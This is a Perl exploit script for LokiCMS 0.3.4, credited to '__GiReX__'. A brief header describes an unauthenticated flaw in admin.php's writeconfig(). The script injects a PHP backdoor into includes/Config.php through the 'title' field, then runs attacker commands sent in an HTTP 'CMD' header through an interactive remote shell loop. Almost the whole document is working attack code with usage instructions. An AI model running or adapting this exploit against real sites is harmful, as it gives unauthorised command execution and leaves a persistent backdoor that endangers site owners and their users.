lokicms034-exec.txt

`# Author: __GiReX__   
# Homepage: http://girex.altervista.org  
  
# CMS: LokiCMS 0.3.4  
# URL: http://www.lokicms.com/  
  
# Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408)  
# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig()  
# LokiCMS does not check the access to admin.php via POST...  
  
#!/usr/bin/perl -w  
# LokiCMS <= 0.3.4 Remote Command Execution Exploit  
# Needs with magic_quotes_gpc = Off  
# Coded by __GiReX__  
  
use LWP::UserAgent;  
  
if(not defined $ARGV[0])  
{  
banner();  
print "[-] Usage: perl $0 [host] [path]\n";  
print "[-] Example: perl $0 localhost /lokicms/\n\n";  
exit;  
}  
  
my $lwp = new LWP::UserAgent or die;  
  
my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];  
$target .= $ARGV[1] unless not defined $ARGV[1];  
$target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;  
  
banner();  
my $res = $lwp->post($target.'admin.php',   
[ 'LokiACTION' => 'A_SAVE_G_SETTINGS',  
'title' => "';echo \"<!-- INFECTED -->\";if(strlen(\$_SERVER['HTTP_CMD']))".  
"passthru(\$_SERVER['HTTP_CMD']);//",   
'language' => 'english-utf-8',  
'theme' => 'default' ]);  
  
if($res->is_error)  
{  
print "[-] Request mistake. Exploit terminated!\n";  
exit ();  
}  
  
while(1)  
{  
print "[+] shell:~\$ ";  
chomp($cmd = <STDIN>);  
last if $cmd eq 'exit';  
  
$lwp->default_header( 'CMD' => $cmd );  
my $res = $lwp->get($target.'includes/Config.php');  
  
if($res->is_success and $res->content =~ /INFECTED/)  
{  
print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n";  
}  
else  
{  
print "[-] PHP Code not injected. maybe magic_quotes_gpc = On!\n";  
last;  
}  
}  
  
sub banner  
{  
print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n";  
print "[+] Coded by __GiReX__\n";  
print "\n";  
}  
  
`